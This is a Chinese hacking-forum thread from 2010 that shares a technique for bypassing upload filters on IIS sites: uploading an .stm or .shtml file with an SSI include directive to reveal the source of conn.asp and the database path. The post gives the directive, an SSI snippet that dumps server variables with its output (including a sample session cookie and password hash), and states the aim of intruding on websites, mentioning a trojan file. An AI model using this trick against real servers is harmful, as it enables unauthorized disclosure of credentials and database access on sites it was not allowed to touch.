当网站不允许上传asp cer cdx htr文件时的一个解决方法

社区服务
高级搜索
猴岛论坛电脑百科当网站不允许上传asp cer cdx htr文件时的一个解决方法
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
2个回复

[资源分享]当网站不允许上传asp cer cdx htr文件时的一个解决方法

楼层直达
不懂也不知道

ZxID:10586231

等级: 禁止发言

举报 只看楼主 使用道具 楼主   发表于: 2010-07-24 0
当网站不允许上传asp cer cdx htr文件时的一个解决方法
前些天向lcx大哥求教关于web上传的问题,说起利用stm来上传,还能执行程序,不解,就给我了一段代码:
<!--#ECHO var="ALL_HTTP"--><br>

当前文件名称:<!--#ECHO var="DOCUMENT_NAME"--><br><br>
Web服务器的名称和版本:<!--#ECHO 
var="SERVER_SOFTWARE"--><br>
主机名:<!--#ECHO var="SERVER_NAME"--><br>
端口:<!--#ECHO var="SERVER_PORT"--><br>
客户或客户*****IP地址:<!--#ECHO var="REMOTE_ADDR"--><br>
客户或客户*****主机名:<!--#ECHO var="REMOTE_HOST"--><br>
PATH_INFO 
的值,但带有扩展为某个目录规范的虚拟路径:<!--#ECHO 
var="PATH_TRANSLATED"--><br>
客户端给出附加路径信息:<!--#ECHO var="PATH_INFO"--><br>
<!--#ECHO var="HTTP_ACCEPT"--><br>
<!--#ECHO var="DOCUMENT_URI"--><br>

说保存为stm或者shtml看看,运行如下:
HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate 
当前文件名称:F:\Web\1.stm
Web服务器的名称和版本:Microsoft-IIS/5.0
主机名:localhost
端口:80
客户或客户*****IP地址:127.0.0.1
客户或客户*****主机名:127.0.0.1
PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径:F:\Web\1.stm
客户端给出附加路径信息:/1.stm
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
一直不解!
今天在幻影旅团看到了一段话

当网站不允许上传
asp cer cdx htr等文件时, 上传一个stm文件, 内容为:
<!--#include file="conn.asp"-->
直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦!
并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!
原来就是如上所说的,
<!--#include file="conn.asp"-->
  就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内容。
我在本地试验成功!在我的iis目录下建了一个test.stm文件,内容为:
<!--#include file="ok.asp"-->
又在同一目录下放了一个我的一个木马文件ok.asp
在浏览器中请求test.stm,没有什么反映,一片空白。
但是一查看源代码,狂晕,原来就是我的asp文件的内容!
这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径,
但是一个前提是服务器的对stm或者shtml的扩展没有删除!
再次感谢lcx大哥的指导!

看海の

ZxID:11408231

等级: 中将
举报 只看该作者 沙发   发表于: 2010-07-25 0
谢谢分享!      #
[url=http://s8.hk/4g5c][i*mg]http://s8.hk/4g59[/img][/ur*l]
5224080

ZxID:1672518

等级: 上将
本无意与众不同 怎奈品位出众

举报 只看该作者 板凳   发表于: 2010-07-25 0
谢谢分享~~~
« 返回列表
发帖 回复